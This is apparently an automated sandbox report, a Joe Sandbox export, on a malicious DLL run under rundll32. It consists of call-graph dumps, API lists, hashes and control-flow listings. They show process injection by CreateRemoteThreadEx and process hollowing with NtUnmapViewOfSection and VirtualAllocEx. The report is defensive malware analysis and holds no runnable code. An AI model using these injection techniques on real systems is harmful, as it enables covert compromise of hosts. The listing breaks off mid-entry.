6735->6736 6736->6708 6141 1000b390 GetModuleHandleA 6142 1000b40b 6141->6142 6143 1000b3ae LoadLibraryA 6141->6143 6144 1000b427 strchr 6142->6144 6145 1000b417 atoi 6142->6145 6146 1000b3bb wsprintfA MessageBoxA 6143->6146 6148 1000b3e8 6143->6148 6150 1000b45f 6144->6150 6149 1000b46f GetProcAddress 6145->6149 6147 10009390 ExitProcess 6146->6147 6147->6148 6148->6142 6151 1000b4c6 6149->6151 6152 1000b47d wsprintfA MessageBoxA 6149->6152 6150->6149 6155 10009390 6152->6155 6156 10009398 6155->6156 6157 100093a1 ExitProcess 6156->6157 6158 100093ad 6156->6158 6784 10009a10 6785 10009a18 6784->6785 6786 10009a28 6785->6786 6787 10009a1f ??3@YAXPAX 6785->6787 6787->6786 6835 10009320 GetProcessHeap 6836 100095e0 6835->6836 7186 10008fae 7187 1000b390 10 API calls 7186->7187 7188 10008fc2 7187->7188 7188->7188 6159 1000a7b0 6160 1000a7c1 6159->6160 6162 1000a7ec ??2@YAPAXI strrchr 6160->6162 6163 1000a8fe 6160->6163 6161 1000a93a 6164 1000a825 6162->6164 6165 1000a829 RegOpenKeyA 6162->6165 6163->6161 6166 1000b990 4 API calls 6163->6166 6164->6165 6167 1000a8ed ??3@YAXPAX 6165->6167 6168 1000a83e ??2@YAPAXI RegQueryValueExA 6165->6168 6170 1000a923 6166->6170 6167->6163 6169 1000a92e 6167->6169 6171 1000a8b1 6168->6171 6172 1000a87c 6168->6172 6174 1000a8d9 ??3@YAXPAX RegCloseKey 6171->6174 6177 1000b990 6171->6177 6173 1000a883 ??3@YAXPAX ??2@YAPAXI RegQueryValueExA 6172->6173 6172->6174 6173->6171 6173->6172 6174->6167 6176 1000a8d2 6176->6174 6178 1000b999 6177->6178 6179 1000b99d 6177->6179 6178->6176 6182 10009430 6179->6182 6183 10009444 RtlAllocateHeap 6182->6183 6184 10009439 GetProcessHeap 6182->6184 6185 10009459 MessageBoxA 6183->6185 6187 10009472 6183->6187 6184->6183 6186 10009390 ExitProcess 6185->6186 6186->6187 6187->6176 6931 1000753c 6934 100061d0 6931->6934 6935 100024e3 4 API calls 6934->6935 6937 100061ea 6935->6937 6936 1000621a EnumWindows 6936->6937 6938 1000751d 6936->6938 6937->6936 6941 10006272 6938->6941 6940 10007536 6942 1000629a 6941->6942 6965 100065cf 6942->6965 6944 100062b3 6945 100024e3 4 API calls 6944->6945 6946 100062df 6945->6946 6947 10006329 GetWindowThreadProcessId 6946->6947 6952 10006564 6946->6952 6948 10006342 6947->6948 6949 1000634f GetCurrentProcessId 6947->6949 6948->6949 6950 10006361 6949->6950 6950->6952 6970 1000667b 6950->6970 6952->6940 6953 1000637f 6976 10009850 6953->6976 6955 100063cf 6955->6952 6956 100024e3 4 API calls 6955->6956 6957 1000646e 6956->6957 6989 10009a40 6957->6989 6959 100064cc 6959->6952 6997 10009b10 6959->6997 6961 10006537 7002 1000676c 6961->7002 6963 1000655f 7018 1000728d 6963->7018 6966 10009660 4 API calls 6965->6966 6967 100065fa 6966->6967 6968 10006614 GetClassNameA 6967->6968 6969 10006635 6968->6969 6969->6944 6971 1000669e 6970->6971 6972 10009660 4 API calls 6971->6972 6973 100066ed 6972->6973 6974 10006707 GetWindowTextA 6973->6974 6975 10006726 6974->6975 6975->6953 6987 1000985b 6976->6987 6977 1000997a 6978 10009430 4 API calls 6977->6978 6979 1000998d 6978->6979 6980 1000b740 2 API calls 6979->6980 6981 100099d4 6980->6981 6981->6955 6982 100098e2 6982->6977 6983 1000b9d0 4 API calls 6982->6983 6984 1000996d 6983->6984 6986 1000b7d0 8 API calls 6984->6986 6985 1000b990 4 API calls 6985->6987 6986->6977 6987->6977 6987->6982 6987->6985 7033 1000b7d0 6987->7033 6990 10009a68 6989->6990 6996 10009ac3 6989->6996 6994 10009a9d 6990->6994 6995 10009acb 6990->6995 6990->6996 6991 10009aa1 _strnicmp 6993 10009af9 6991->6993 6991->6994 6992 10009acf _strncoll 6992->6993 6992->6995 6993->6959 6994->6991 6994->6996 6995->6992 6995->6996 6996->6959 7038 1000ba20 6997->7038 6999 10009b31 7000 100094c0 3 API calls 6999->7000 7001 10009b3a 6999->7001 7000->7001 7001->6961 7004 10006775 7002->7004 7005 100067ba 7004->7005 7046 100068f2 VirtualProtect 7004->7046 7009 1000680c 7005->7009 7048 10006984 7005->7048 7007 100024e3 4 API calls 7008 1000683d 7007->7008 7053 10006af4 7008->7053 7009->7007 7011 1000686a 7012 100068f2 VirtualProtect 7011->7012 7013 1000689a 7012->7013 7014 100068f2 VirtualProtect 7013->7014 7015 100068aa 7014->7015 7065 10009ba0 7015->7065 7017 100068cb 7017->6963 7114 10002d31 7018->7114 7020 100072a7 7021 1000a640 2 API calls 7020->7021 7022 10007315 7021->7022 7023 1000a6f0 4 API calls 7022->7023 7024 10007365 7023->7024 7025 10009b10 8 API calls 7024->7025 7026 100073a8 7025->7026 7123 1000a760 PathFileExistsA 7026->7123 7028 10007412 7029 10007479 7028->7029 7124 1000a770 DeleteFileA 7028->7124 7125 1000a780 CopyFileA 7029->7125 7032 100074e9 7032->6952 7034 1000b7f5 7033->7034 7035 1000b7dd 7033->7035 7036 1000b810 8 API calls 7034->7036 7035->6987 7037 1000b801 7036->7037 7037->6987 7039 1000ba37 7038->7039 7040 1000ba3b 7038->7040 7039->6999 7041 1000ba46 _strncoll 7040->7041 7043 1000ba6d 7040->7043 7041->7040 7041->7043 7042 1000ba7b 7042->6999 7043->7042 7044 10009430 4 API calls 7043->7044 7045 1000ba86 7044->7045 7045->6999 7047 1000692d 7046->7047 7047->7004 7049 100069ab VirtualProtect 7048->7049 7052 100069a1 7048->7052 7050 100069d4 7049->7050 7051 10009bf0 4 API calls 7050->7051 7051->7052 7052->7009 7054 10006b38 7053->7054 7070 10009c20 7054->7070 7056 10006bf9 7081 10009d50 7056->7081 7058 10009d80 4 API calls 7064 10006c6f 7058->7064 7059 10006c97 7059->7011 7061 1000a030 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 7061->7064 7063 10009de0 25 API calls 7063->7064 7064->7058 7064->7059 7064->7061 7064->7063 7085 1000703e 7064->7085 7093 1000a110 7064->7093 7066 10009bb4 7065->7066 7067 10009bb7 7065->7067 7066->7017 7068 10009430 4 API calls 7067->7068 7069 10009bbe 7068->7069 7069->7017 7071 10009c43 7070->7071 7072 10009c3d 7070->7072 7073 10009430 4 API calls 7071->7073 7072->7056 7080 10009c4d 7073->7080 7074 10009cee 7075 10009d0f 7074->7075 7077 100094c0 3 API calls 7074->7077 7075->7056 7076 10009c6a _strncoll 7076->7080 7077->7075 7078 10009c9b _strncoll 7078->7080 7079 10009cca strncpy 7079->7080 7080->7074 7080->7076 7080->7078 7080->7079 7082 10009d76 7081->7082 7083 10009d5b 7081->7083 7082->7064 7084 10009d63 _CIfmod 7083->7084 7084->7082 7084->7084 7091 10007072 7085->7091 7086 10007215 7088 1000a370 16 API calls 7086->7088 7089 1000724b 7086->7089 7088->7089 7089->7064 7090 10009a40 2 API calls 7090->7091 7091->7086 7091->7090 7108 1000a270 7091->7108 7113 1000a2e0 _CIpow 7091->7113 7094 1000a128 7093->7094 7095 1000a15d 7093->7095 7096 1000a130 7094->7096 7099 1000b990 4 API calls 7094->7099 7097 1000a253 7095->7097 7102 1000a175 7095->7102 7096->7064 7098 1000b990 4 API calls 7097->7098 7100 1000a25a 7098->7100 7101 1000a155 7099->7101 7100->7064 7101->7064 7103 10009430 4 API calls 7102->7103 7104 1000a1b9 7103->7104 7105 1000a1c3 strncpy 7104->7105 7106 1000a1dd strncpy 7104->7106 7107 1000a1d9 7105->7107 7106->7107 7107->7064 7109 1000a2d1 7108->7109 7110 1000a286 7108->7110 7109->7091 7110->7109 7111 10009430 4 API calls 7110->7111 7112 1000a2af 7111->7112 7112->7091 7113->7091 7115 10008f42 7114->7115 7116 10002d44 PathIsDirectoryA 7115->7116 7117 10002d81 7116->7117 7118 10009850 12 API calls 7117->7118 7119 10002d96 7117->7119 7120 10002dd7 7118->7120 7119->7020 7120->7119 7121 10002f3c PathIsDirectoryA 7120->7121 7122 10002f70 CreateDirectoryA 7120->7122 7121->7120 7122->7120 7123->7028 7124->7029 7125->7032 6188 100094c0 6189 10009506 6188->6189 6190 100094cd 6188->6190 6191 100094d6 6190->6191 6192 100094db 6190->6192 6196 10009360 6191->6196 6192->6189 6193 100094eb IsBadHugeReadPtr 6192->6193 6193->6189 6195 100094f8 RtlFreeHeap 6193->6195 6195->6189 6197 10009370 6196->6197 6198 10009369 GetModuleHandleA 6196->6198 6197->6192 6198->6197 7126 1000c440 7127 1000c467 7126->7127 7128 1000c4db 7126->7128 7127->7128 7136 1000c46c SHGetSpecialFolderPathA 7127->7136 7129 1000c4e0 GetWindowsDirectoryA 7128->7129 7130 1000c4f2 7128->7130 7135 1000c4d9 7129->7135 7131 1000c4f7 GetSystemDirectoryA 7130->7131 7132 1000c509 7130->7132 7131->7135 7134 1000c50e GetTempPathA 7132->7134 7132->7135 7134->7135 7136->7135 6264 1008354a 6266 10083555 6264->6266 6267 10083569 6266->6267 6268 1008357b VirtualAlloc 6266->6268 6267->6268 6271 100837bd 6267->6271 6269 100835b7 6268->6269 6268->6271 6272 100835c2 6269->6272 6273 100835d1 6272->6273 6274 10083632 VirtualFree 6273->6274 6276 1008365a 6274->6276 6275 1008379e VirtualProtect 6275->6275 6277 100837bd 6275->6277 6276->6275 6276->6277 6277->6271 6199 1000b4e0 6202 10008f24 6199->6202 6203 10008f2c 6202->6203 6208 10001027 6203->6208 6205 10008f31 6216 100013d3 6205->6216 6207 10008f36 6209 1000103a 6208->6209 6210 100010d6 WSAStartup 6209->6210 6211 10001157 6210->6211 6253 10009520 6211->6253 6213 10001190 6214 10009520 5 API calls 6213->6214 6215 100011db 6214->6215 6215->6205 6260 100017ab 6216->6260 6218 100013e1 6219 10009660 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6218->6219 6220 10001401 6219->6220 6221 1000141e GetModuleFileNameA 6220->6221 6222 10001447 6221->6222 6223 10001817 16 API calls 6222->6223 6224 10001464 6223->6224 6225 100096a0 8 API calls 6224->6225 6226 10001489 6225->6226 6227 10009710 SetFileAttributesA 6226->6227 6228 100014dd 6227->6228 6229 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6228->6229 6230 100014f1 6229->6230 6231 10002d31 15 API calls 6230->6231 6232 1000150d 6231->6232 6233 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6232->6233 6234 1000152e 6233->6234 6235 1000300a CreateFileA WriteFile CloseHandle 6234->6235 6236 1000154f 6235->6236 6237 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6236->6237 6238 10001570 6237->6238 6239 10001583 LoadLibraryA 6238->6239 6240 10001598 6239->6240 6241 10009730 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA GetModuleFileNameA 6240->6241 6242 100015c4 6241->6242 6243 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6242->6243 6244 100015db 6243->6244 6245 10001635 CreateRemoteThreadEx 6244->6245 6246 10001686 6244->6246 6252 1000166f 6245->6252 6247 100024e3 ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 6246->6247 6248 10001697 6247->6248 6249 10003356 26 API calls 6248->6249 6250 1000171a 6249->6250 6251 10001753 CreateRemoteThreadEx 6250->6251 6251->6252 6252->6207 6254 10009531 6253->6254 6255 10009536 6253->6255 6256 10009360 GetModuleHandleA 6254->6256 6257 10009594 6255->6257 6258 10009430 4 API calls 6255->6258 6256->6255 6257->6213 6259 10009579 6258->6259 6259->6213 6262 100017b4 GetPEB 6260->6262 6263 100017c3 6262->6263 7152 1000b360 7153 1000b36d 7152->7153 7154 1000b381 7153->7154 7155 1000b373 FreeLibrary 7153->7155 7155->7153 7155->7154 7213 100099e0 7214 1000b740 2 API calls 7213->7214 7215 100099ee 7214->7215 7216 100099f5 ??3@YAXPAX 7215->7216 7217 100099fe 7215->7217 7216->7217 7230 100045fc 7231 10004633 7230->7231 7232 10005d6f 2 API calls 7231->7232 7233 1000464d 7232->7233 7234 10004786 CreateProcessA 7233->7234 7235 1000487e 7234->7235 7236 100049a4 GetThreadContext 7235->7236 7257 1000496f 7235->7257 7237 10004b18 7236->7237 7238 10009520 5 API calls 7237->7238 7239 10004bcb 7238->7239 7240 10004ccd 7239->7240 7241 10004cdf 7239->7241 7242 10005e5f 3 API calls 7240->7242 7243 10004d24 ReadProcessMemory 7241->7243 7242->7257 7244 10004d39 7243->7244 7245 10004d50 7244->7245 7246 10004d62 NtUnmapViewOfSection 7244->7246 7248 10005e5f 3 API calls 7245->7248 7247 10004d85 7246->7247 7249 10004db1 VirtualAllocEx 7247->7249 7250 10004d9f 7247->7250 7248->7257 7252 10004dfc 7249->7252 7251 10005e5f 3 API calls 7250->7251 7251->7257 7253 10004e16 7252->7253 7255 10004e28 7252->7255 7254 10005e5f 3 API calls 7253->7254 7254->7257 7256 10005084 LocalSize 7255->7256 7270 1000509b 7256->7270 7258 100057c5 7260 10009520 5 API calls 7258->7260 7259 10009520 GetModuleHandleA ExitProcess GetProcessHeap RtlAllocateHeap MessageBoxA 7259->7270 7261 10005aab 7260->7261 7262 10005bd9 WaitForSingleObject 7261->7262 7263 10005bfd 7261->7263 7262->7263 7263->7257 7264 10005c14 CloseHandle 7263->7264 7265 10005c43 CloseHandle 7264->7265 7266 10005c36 7264->7266 7265->7257 7266->7265 7267 10005f47 2 API calls 7267->7270 7268 10005660 7269 10005e5f 3 API calls 7268->7269 7269->7257 7270->7258 7270->7259 7270->7267 7270->7268

    Executed Functions

    Function 10003356 Relevance: 25.0, APIs: 14, Instructions: 4041COMMON
    Download Yara Rule
    APIs
    • LocalSize.KERNEL32(00000000), ref: 1000372A
    • RtlMoveMemory.NTDLL(00000000,?), ref: 100039B0
    • LocalSize.KERNEL32(00000000), ref: 10003D81
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 1000417F
    • LocalSize.KERNEL32(00000000), ref: 10004484
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: LocalSize$MemoryMove
    • String ID:
    • API String ID: 2329245388-0
    • Opcode ID: 7ace0d35f767871dd564e10688227d60866cd99a6ec69d537ca719f32c9c7f33
    • Instruction ID: 6597548e417ce41973f24dc3fe005e763f74c0b4b92ccc5acbc8f0888a27e9fc
    • Opcode Fuzzy Hash: 7ace0d35f767871dd564e10688227d60866cd99a6ec69d537ca719f32c9c7f33
    • Instruction Fuzzy Hash: 9163A4F5A812568BFB00CF58DCC1699B7F1FF69364B291471E846AB304D378B861DB22
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10001817 Relevance: 14.1, APIs: 9, Instructions: 597nativememoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 489 10001817-10001890 call 10008f42 493 10001e94-10001e99 489->493 494 10001896-100018af call 10001f4e call 100017fe 489->494 495 10001eae-10001eba 493->495 510 100018b0-100018b8 494->510 498 10001ebc 495->498 499 10001ecd 495->499 501 10001ebe-10001ec2 498->501 502 10001ed3-10001f06 call 10008f3c * 3 499->502 503 10001f08-10001f15 call 10008f3c 499->503 506 10001ec4-10001ec7 501->506 507 10001ec9-10001ecb 501->507 502->503 512 10001f20-10001f24 503->512 513 10001f17-10001f1d call 10008f3c 503->513 506->501 507->499 514 10001958-10001966 510->514 515 100018be-100018cc call 10001007 510->515 513->512 519 10001968 514->519 520 10001979 514->520 529 100018db-100018df 515->529 530 100018ce-100018d8 call 10008f48 515->530 526 1000196a-1000196e 519->526 522 100019b4-100019dd call 10008f3c call 100024e3 520->522 523 1000197f-100019b2 call 10008f3c * 3 520->523 552 100019e8-100019fb GetModuleHandleA 522->552 553 100019df-100019e5 call 10008f3c 522->553 523->522 532 10001970-10001973 526->532 533 10001975-10001977 526->533 538 100018e1-100018eb call 10008f48 529->538 539 100018ee-10001900 529->539 530->529 532->526 533->520 538->539 544 10001950-10001953 539->544 545 10001906-10001914 call 10001007 539->545 544->510 556 10001923-10001927 545->556 557 10001916-10001920 call 10008f48 545->557 554 10001a0a-10001a12 552->554 555 100019fd-10001a07 call 10008f48 552->555 553->552 562 10001a14-10001a1a call 10008f3c 554->562 563 10001a1d-10001a3c call 100024e3 554->563 555->554 564 10001936-1000194b 556->564 565 10001929-10001933 call 10008f48 556->565 557->556 562->563 575 10001a47-10001a5b call 100027c4 563->575 576 10001a3e-10001a44 call 10008f3c 563->576 564->514 565->564 581 10001a66-10001a85 call 100024e3 575->581 582 10001a5d-10001a63 call 10008f3c 575->582 576->575 587 10001a90-10001aa4 call 100027c4 581->587 588 10001a87-10001a8d call 10008f3c 581->588 582->581 593 10001aa6-10001aac call 10008f3c 587->593 594 10001aaf-10001ace call 100024e3 587->594 588->587 593->594 599 10001ad0-10001ad6 call 10008f3c 594->599 600 10001ad9-10001aed call 100027c4 594->600 599->600 605 10001af8-10001b2a NtAllocateVirtualMemory 600->605 606 10001aef-10001af5 call 10008f3c 600->606 608 10001b39-10001b40 605->608 609 10001b2c-10001b36 call 10008f48 605->609 606->605 608->493 610 10001b46-10001b70 NtReadVirtualMemory 608->610 609->608 613 10001b72-10001b7c call 10008f48 610->613 614 10001b7f-10001b86 610->614 613->614 617 10001e5b-10001e85 NtFreeVirtualMemory 614->617 618 10001b8c-10001b90 614->618 617->493 622 10001e87-10001e91 call 10008f48 617->622 620 10001bc2-10001bcc call 1000283c 618->620 621 10001b96-10001bb3 618->621 620->617 628 10001bd2-10001c06 NtAllocateVirtualMemory 620->628 621->620 629 10001bb5-10001bbf call 10008f48 621->629 622->493 630 10001c15-10001c1c 628->630 631 10001c08-10001c12 call 10008f48 628->631 629->620 634 10001c22-10001c26 630->634 635 10001d56-10001d6e 630->635 631->630 634->635 638 10001c2c-10001c33 634->638 643 10001d70-10001d7a call 10008f48 635->643 644 10001d7d-10001d84 635->644 639 10001c35-10001c46 call 10008f42 638->639 640 10001c48-10001c4e 638->640 639->640 645 10001c50-10001c56 call 10008f3c 640->645 646 10001c59-10001c69 640->646 643->644 644->617 649 10001d8a-10001db6 NtAllocateVirtualMemory 644->649 645->646 651 10001c70-10001c91 call 100097d0 646->651 652 10001c6b 646->652 655 10001dc5-10001dcc 649->655 656 10001db8-10001dc2 call 10008f48 649->656 661 10001c93 651->661 662 10001c96-10001ca7 651->662 652->651 655->617 658 10001dd2-10001dfc 655->658 656->655 665 10001e0b-10001e12 658->665 666 10001dfe-10001e08 call 10008f48 658->666 661->662 669 10001cb6-10001cfd call 10002d17 NtFreeVirtualMemory 662->669 670 10001ca9-10001cb3 call 10008f48 662->670 665->617 671 10001e18-10001e42 NtFreeVirtualMemory 665->671 666->665 681 10001d0c-10001d36 NtFreeVirtualMemory 669->681 682 10001cff-10001d09 call 10008f48 669->682 670->669 674 10001e51-10001e56 671->674 675 10001e44-10001e4e call 10008f48 671->675 674->495 675->674 683 10001d45-10001d51 681->683 684 10001d38-10001d42 call 10008f48 681->684 682->681 683->495 684->683
    APIs
    • GetModuleHandleA.KERNEL32(?,?,?,00000000,00000001,00000001), ref: 100019EE
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00001000,00000040), ref: 10001B1D
    • NtReadVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,?), ref: 10001B63
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,?,00001000,00000040), ref: 10001BF9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001CF0
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001D29
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00003000,00000040), ref: 10001DA9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E35
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E78
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: MemoryVirtual$Free$Allocate$HandleModuleRead
    • String ID:
    • API String ID: 3626904461-0
    • Opcode ID: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction ID: 18045018c71ed80e37ca4e743997fd2e00c365ecd51ce7d830d4e4c8732093b4
    • Opcode Fuzzy Hash: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction Fuzzy Hash: 6D1249B1D10219ABFF40DFA4DC82BEEB7B9EB09390F105035F515B6285E771AA44CB62
    Uniqueness

    Uniqueness Score: -1.00%

    Function 100013D3 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299threadlibraryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 708 100013d3-10001413 call 100017ab call 10009660 713 10001415-1000141b call 10008f3c 708->713 714 1000141e-10001445 GetModuleFileNameA 708->714 713->714 715 10001454-10001472 call 10001817 714->715 716 10001447-10001451 call 10008f48 714->716 723 10001474 715->723 724 10001479-1000149b call 100096a0 715->724 716->715 723->724 727 100014a6-100014c6 724->727 728 1000149d-100014a3 call 10008f3c 724->728 729 100014c8 727->729 730 100014cd-100014f9 call 10009710 call 100024e3 727->730 728->727 729->730 737 10001504-10001512 call 10002d31 730->737 738 100014fb-10001501 call 10008f3c 730->738 743 10001514-1000151a call 10008f3c 737->743 744 1000151d-10001536 call 100024e3 737->744 738->737 743->744 749 10001541-10001554 call 1000300a 744->749 750 10001538-1000153e call 10008f3c 744->750 755 10001556-1000155c call 10008f3c 749->755 756 1000155f-10001578 call 100024e3 749->756 750->749 755->756 761 10001583-10001596 LoadLibraryA 756->761 762 1000157a-10001580 call 10008f3c 756->762 763 100015a5-100015aa 761->763 764 10001598-100015a2 call 10008f48 761->764 762->761 768 100015b5-100015e3 call 10009730 call 100024e3 763->768 769 100015ac-100015b2 call 10008f3c 763->769 764->763 777 100015e5-100015eb call 10008f3c 768->777 778 100015ee-10001610 call 10001336 768->778 769->768 777->778 783 10001612-10001618 call 10008f3c 778->783 784 1000161b-10001620 778->784 783->784 786 10001622-10001628 call 10008f3c 784->786 787 1000162b-1000162f 784->787 786->787 790 10001635-1000166d CreateRemoteThreadEx 787->790 791 10001686-1000169f call 100024e3 787->791 794 1000167c-10001681 790->794 795 1000166f-10001679 call 10008f48 790->795 799 100016a1-100016a7 call 10008f3c 791->799 800 100016aa-1000171f call 10008f42 call 10003356 791->800 796 100017a7-100017aa 794->796 795->794 799->800 808 10001721-10001727 call 10008f3c 800->808 809 1000172a-1000172f 800->809 808->809 810 10001731-10001737 call 10008f3c 809->810 811 1000173a-1000173f 809->811 810->811 814 10001741-10001747 call 10008f3c 811->814 815 1000174a-1000178e call 10008f3c CreateRemoteThreadEx 811->815 814->815 822 10001790-1000179a call 10008f48 815->822 823 1000179d-100017a2 815->823 822->823 823->796
    APIs
    • GetModuleFileNameA.KERNEL32(000000FF), ref: 10001438
    • LoadLibraryA.KERNELBASE(?,?,?,10069CE3,?,?,?), ref: 10001589
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,1000753C,00000000,00000000,00000000,00000000), ref: 10001660
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,Function_00008E08,00000000,00000000,00000000,00000000), ref: 10001781
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: CreateRemoteThread$FileLibraryLoadModuleName
    • String ID: -K NetworkService
    • API String ID: 1086537905-2689450296
    • Opcode ID: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction ID: 192b5ded5049eacffa80d3a177baae0e671814ab7fcffe4313666e61edc3dd04
    • Opcode Fuzzy Hash: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction Fuzzy Hash: 07A121B5E10345ABFB40DFA0CCC2BEE76B9EB14780F104075F605BB286EA75AB149B51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10002D31 Relevance: 4.8, APIs: 3, Instructions: 258COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 831 10002d31-10002d7f call 10008f42 PathIsDirectoryA 834 10002d81-10002d8b call 10008f48 831->834 835 10002d8e-10002d90 831->835 834->835 837 10002da0-10002dc0 835->837 838 10002d96-10002d9b 835->838 839 10002dc2 837->839 840 10002dc7-10002dec call 10009850 837->840 842 10002fad-10002fb9 838->842 839->840 852 10002dee 840->852 853 10002dff 840->853 843 10002fbb 842->843 844 10002fcc 842->844 846 10002fbd-10002fc1 843->846 848 10002fd2-10002fd7 844->848 849 10002feb-10002ff8 call 10008f3c 844->849 850 10002fc3-10002fc6 846->850 851 10002fc8-10002fca 846->851 854 10002fe4-10002fe9 848->854 855 10002fd9-10002fe3 call 10008f3c 848->855 867 10003003-10003007 849->867 868 10002ffa-10003000 call 10008f3c 849->868 850->846 851->844 857 10002df0-10002df4 852->857 859 10002e05-10002e0a 853->859 860 10002e1e-10002e39 call 10008f3c call 10001007 853->860 854->848 854->849 855->854 862 10002df6-10002df9 857->862 863 10002dfb-10002dfd 857->863 865 10002e17-10002e1c 859->865 866 10002e0c-10002e16 call 10008f3c 859->866 877 10002e48-10002e71 call 10002487 860->877 878 10002e3b-10002e45 call 10008f48 860->878 862->857 863->853 865->859 865->860 866->865 868->867 883 10002e73-10002e79 call 10008f3c 877->883 884 10002e7c-10002ead call 100017fe call 10001f27 877->884 878->877 883->884 891 10002eae-10002eb6 884->891 892 10002fa2-10002fa8 891->892 893 10002ebc-10002ee1 call 10001007 call 10001f27 891->893 892->842 898 10002ef0-10002ef4 893->898 899 10002ee3-10002eed call 10008f48 893->899 901 10002f03-10002f31 call 10002487 898->901 902 10002ef6-10002f00 call 10008f48 898->902 899->898 908 10002f33-10002f39 call 10008f3c 901->908 909 10002f3c-10002f53 PathIsDirectoryA 901->909 902->901 908->909 911 10002f62-10002f6a 909->911 912 10002f55-10002f5f call 10008f48 909->912 915 10002f70-10002f88 CreateDirectoryA 911->915 916 10002f9a-10002f9d 911->916 912->911 918 10002f97 915->918 919 10002f8a-10002f94 call 10008f48 915->919 916->891 918->916 919->918
    APIs
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002D72
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002F46
    • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 10002F7B
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Directory$Path$Create
    • String ID:
    • API String ID: 2243348845-0
    • Opcode ID: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction ID: 1ec6a9b9599abdcb0927499382ee2c56efe62a98ad550a515e2561b25c9f74a4
    • Opcode Fuzzy Hash: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction Fuzzy Hash: 368151B5E00206ABFB40DFA4DC82BBEB7B5EF193C0F140079E545F6249E771AA548762
    Uniqueness

    Uniqueness Score: -1.00%

    Function 1000300A Relevance: 4.7, APIs: 3, Instructions: 220fileCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
    • CreateFileA.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000020,00000000), ref: 1000308D
    • WriteFile.KERNELBASE(00000000,10007715,00000000,?,00000000), ref: 1000324E
    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 10003270
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: File$CloseCreateHandleWrite
    • String ID:
    • API String ID: 1065093856-0
    • Opcode ID: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction ID: d20d66cfc10cbe3857bc80674b720ab49801aad87d9546e672d044fe8a3a2069
    • Opcode Fuzzy Hash: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction Fuzzy Hash: C0619AF5D00205AFFB41DFA4DC83BAF77B5EB09380F104075F645AB286E6756A448BA2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 10005E5F Relevance: 4.6, APIs: 3, Instructions: 79COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
